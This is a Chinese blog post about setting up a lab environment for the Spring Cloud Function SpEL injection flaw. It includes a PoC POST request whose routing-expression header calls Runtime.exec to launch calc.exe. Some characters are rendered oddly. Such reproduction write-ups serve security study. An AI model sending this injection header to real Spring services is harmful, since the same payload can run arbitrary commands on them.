Spring-Cloud-Function-Spel?漏洞環(huán)境搭建
1、漏洞環(huán)境搭建
由于漏洞出現(xiàn)在前兩天,原本等待vulhub出環(huán)境,直接docker 一鍵就ok了。但是這次vulhub好像不太及時。對于自己只能自己搭建環(huán)境了。
找了許久,終于在唐大佬的github中找到幾乎一鍵的方法。
參考鏈接:https://github.com/tangxiaofeng7/Spring-Cloud-Function-Spel 這里放原始鏈接以表示尊重。
無法上github的話,私信我。
搭建方法很簡單,先安裝maven jdk 等。大佬是jdk17 我本地下載最新版本18 也是ok

方法如下:下載代碼后,在解壓目錄cmd執(zhí)行 mvn spring-boot:run 會下載很多庫,需要耐心等待。成功后會開啟8080 端口。

漏洞poc極其簡單:
路徑最好使用funtionRouter,原因自查。此環(huán)境倒是任意路徑都ok。
POST /functionRouter HTTP/1.1
Host: 192.168.1.7:8080
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("calc.exe")
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

漏洞驗證:

到此這篇關于Spring-Cloud-Function-Spel 漏洞復現(xiàn)的文章就介紹到這了,更多相關Spring-Cloud-Function-Spel 漏洞內容請搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關文章希望大家以后多多支持腳本之家!
相關文章
解決SpringBoot啟動過后不能訪問jsp頁面的問題(超詳細)
這篇文章主要介紹了解決SpringBoot啟動過后不能訪問jsp頁面的問題,文中通過示例代碼介紹的非常詳細,有需要的朋友可以參考一下,希望對你有所幫助。2020-05-05
idea插件之如何使用JarEditor編輯Java JAR文件
JarEditor是一款用于在IntelliJIDEA中直接編輯JAR文件的插件,支持反編譯查看和編輯.class文件,并提供即時編譯與保存功能,通過JarEditor,用戶可以在IDE內一站式完成JAR文件的編輯、管理和打包操作,提高開發(fā)效率,但在生產環(huán)境中使用前,請確保備份并測試修改2025-01-01
Java數據庫連接池之c3p0簡介_動力節(jié)點Java學院整理
這篇文章主要為大家詳細介紹了Java數據庫連接池之c3p0簡介的相關資料,具有一定的參考價值,感興趣的小伙伴們可以參考一下2017-08-08

